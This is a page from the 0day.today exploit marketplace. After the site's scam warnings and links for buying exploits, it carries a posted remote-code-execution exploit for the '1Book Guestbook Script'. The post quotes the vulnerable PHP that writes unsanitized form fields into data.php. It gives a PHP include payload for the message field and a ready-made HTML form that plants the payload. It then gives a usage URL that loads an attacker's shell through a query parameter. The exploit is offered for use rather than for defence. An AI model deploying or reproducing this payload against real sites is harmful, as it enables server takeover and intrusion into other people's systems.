0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
1Book Guestbook Script Code Execution Vulnerability
=================================================== 1Book Guestbook Script Code Execution Vulnerability =================================================== ========================================================= =============== JIKI TEAM [ Maroc And YameN ]=============== ========================================================= # Author : jiko # Script : 1Book Guestbook Script # Bug : remote code execution # Download : http://1scripts.net/scripts/1book.zip =========================JIkI Team=================== # if(in_array($_POST['username'], $bannedusers)) # echo 'Your username has been banned by the administrator.<br/><br/>'; # if(in_array($_SERVER['REMOTE_ADDR'], $bannedips)) # echo 'Your IP has been banned by the administrator.<br/><br/>'; # elseif($_POST['1'] + $_POST['2'] != $_POST['check']) # echo('You answered the security question incorrectly.'); # else # { # $data = unserialize(file_get_contents('data.php')); # array_push($data, array('user' => $_POST['username'], 'date' => mktime(), 'message' => $_POST['message'], 'website' => $_POST['website'], 'ip' => $_SERVER['REMOTE_ADDR'])); # file_put_contents('data.php', serialize($data)); # } # #} #===========================================================================================================================# # So, we can write a malicious code like <?php include($jiko); ?> in the variable $message, and $username # # and then we go in http://Site/script/data/data.php?jiko=[shell] # #===========================================================================================================================# simple exploit whith HTML: ------------------------- change site by your site +++++++++++++++++++++++++ <title> EXploit BY JIKO</title> <center> <form method="post" action="site/guestbook.php"> <input type=hidden name=username value="jiko was here" > <input type=hidden name=message value="<? include($jiko) ?>" > <input type=submit value="send"> </form> <h5>a fter send your usage: <br>http://site/scripts/data.php?jiko=[shell]</h5> ========================================================= # 0day.today [2024-11-16] #